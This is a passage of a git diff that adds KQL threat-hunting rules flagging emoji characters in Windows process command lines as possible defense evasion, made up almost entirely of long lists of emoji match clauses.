contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains "🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or 
ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
new file mode 100644
index 00000000..4c0221ee
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine 
contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains "🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine 
contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or 
ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains "🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" 
or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or 
ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or 
ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains "🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or 
ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" 
or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" 
or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" 
or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" 
or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" 
or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains 